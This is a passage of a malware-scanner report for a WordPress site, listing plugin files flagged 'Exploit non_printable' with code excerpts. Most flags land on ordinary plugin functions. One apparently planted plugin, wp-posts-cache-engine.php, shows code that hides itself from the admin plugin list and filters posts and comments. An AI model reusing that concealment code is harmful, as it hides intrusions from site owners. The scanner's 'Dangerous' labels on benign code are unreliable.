</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_506").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/modules.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.56 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_507" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ var </span><span style="color: #0000BB">is_check </span><span style="color: #007700">= (</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">is</span><span style="color: #007700">(</span><span style="color: #DD0000">':checked'</span><span style="color: #007700">)) ? </span><span style="color: #0000BB">true </span><span style="color: #007700">: </span><span style="color: #0000BB">false</span><span style="color: #007700">; </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch'</span><span style="color: #007700">).</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">is_check</span><span style="color: #007700">); }); }); </</span><span style="color: #0000BB">script</span><span style="color: #007700">> <</span><span style="color: #0000BB">style type</span><span style="color: #007700">=</span><span style="color: #DD0000">"text/css"</span><span style="color: #007700">> </span><span style="color: #FF8000">/*On Off Checkbox Switch*/ </span><span style="color: #007700">.</span><span style="color: #0000BB">onoffswitch </span><span style="color: #007700">{ </span><span style="color: #0000BB">position</span><span style="color: #007700">: </span><span style="color: #0000BB">relative</span><span style="color: #007700">; </span><span style="color: #0000BB">width</span><span style="color: #007700">: </span><span style="color: #0000BB">95px</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">result</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 209</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 211</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_507").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/debug.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 20.90 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_508" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">$switch </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">); </span><span style="color: #0000BB">setTimeout</span><span style="color: #007700">(function(){ if(</span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">is</span><span style="color: #007700">(</span><span style="color: #DD0000">':checked'</span><span style="color: #007700">)) </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">false</span><span style="color: #007700">); else </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">true</span><span style="color: #007700">); </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">trigger</span><span style="color: #007700">(</span><span style="color: #DD0000">'onUltima</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 382</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">result</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 395</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_508").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/script-styles.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.06 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_509" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch'</span><span style="color: #007700">).</span><span style="color: #0000BB">click</span><span style="color: #007700">(function(){ </span><span style="color: #0000BB">$switch </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">); </span><span style="color: #0000BB">setTimeout</span><span style="color: #007700">(function(){ if(</span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">is</span><span style="color: #007700">(</span><span style="color: #DD0000">':checked'</span><span style="color: #007700">)) </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">false</span><span style="color: #007700">); else </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">result</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 146</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_509").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-posts-cache-engine/wp-posts-cache-engine.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.07 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-06 14:49:36</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-06 14:49:36</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_510" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hide_my_plugin_from_list</span><span style="color: #007700">(</span><span style="color: #0000BB">$plugins</span><span style="color: #007700">) { </span><span style="color: #0000BB">$plugin_file </span><span style="color: #007700">= </span><span style="color: #0000BB">plugin_basename</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">); </span><span style="color: #0000BB">$active_plugins </span><span style="color: #007700">= (array)</span><span style="color: #0000BB">get_option</span><span style="color: #007700">(</span><span style="color: #DD0000">'active_plugins'</span><span style="color: #007700">, array()); if (</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$plugin_file</span><span style="color: #007700">, </span><span style="color: #0000BB">$active_plugins</span><span style="color: #007700">, </span><span style="color: #0000BB">true</span><span style="color: #007700">)) { unset(</span><span style="color: #0000BB">$plugins</span><span style="color: #007700">[</span><span style="color: #0000BB">$plugin_file</span><span style="color: #007700">]); } return </span><span style="color: #0000BB">$plugins</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">$query</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">exclude_meta_posts_where</span><span style="color: #007700">(</span><span style="color: #0000BB">$where</span><span style="color: #007700">, </span><span style="color: #0000BB">$query</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$where</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$clauses</span><span style="color: #007700">, </span><span style="color: #0000BB">$wp_comment_query</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$clauses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ppe_enable_pretty_permalinks</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ppe_deactivate_plugin</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hide_my_plugin_from_list</span><span style="color: #007700">(</span><span style="color: #0000BB">$plugins</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$plugins</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_510").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/db.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.70 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_511" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clean</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">){ global </span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">; </span><span style="color: #0000BB">$statics </span><span style="color: #007700">= array(); switch (</span><span style="color: #0000BB">$type</span><span style="color: #007700">){ case </span><span style="color: #DD0000">"all_warnings"</span><span style="color: #007700">: </span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-></span><span style="color: #0000BB">query</span><span style="color: #007700">(</span><span style="color: #DD0000">"DELETE FROM `</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-></span><span style="color: #0000BB">posts</span><span style="color: #DD0000">` WHERE post_type = 'revision';"</span><span style="color: #007700">); </span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-></span><span style="color: #0000BB">query</span><span style="color: #007700">(</span><span style="color: #DD0000">"DELETE FROM `</span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-></span><span style="color: #0000BB">posts</span><span style="color: #DD0000">` WHERE post_status = 'trash';"</span><span style="color: #007700">); </span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-></span><span style="color: #0000BB">query</span><span style="color: #007700">(</span><span style="color: #DD0000">"DELETE FROM</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clean</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_511").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/powerful-html.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 36.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 55</span><br><table id="file_512" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">html</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">fix_protocol</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">"/^\/\//"</span><span style="color: #007700">, </span><span style="color: #0000BB">$url</span><span style="color: #007700">)){ if(</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">"/^https:\/\//"</span><span style="color: #007700">, </span><span style="color: #0000BB">home_url</span><span style="color: #007700">())){ return </span><span style="color: #DD0000">"https:"</span><span style="color: #007700">.</span><span style="color: #0000BB">$url</span><span style="color: #007700">; }else{ return </span><span style="color: #DD0000">"http:"</span><span style="color: #007700">.</span><span style="color: #0000BB">$url</span><span style="color: #007700">; } } return </span><span style="color: #0000BB">$url</span><span style="color: #007700">; } } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1037</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">minify_js_in_body</span><span style="color: #007700">(</span><span style="color: #0000BB">$wpfc</span><span style="color: #007700">, </span><span style="color: #0000BB">$exclude_rules </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1161</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">combine_js_in_footer</span><span style="color: #007700">(</span><span style="color: #0000BB">$content</span><span style="color: #007700">, </span><span style="color: #0000BB">$minify </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fix_protocol</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"https:"</span><span style="color: #007700">.</span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"http:"</span><span style="color: #007700">.</span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">search_in_inline_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$content</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_spaces_in_tag</span><span style="color: #007700">(</span><span style="color: #0000BB">$matches</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$matches</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">];</span>
</span>
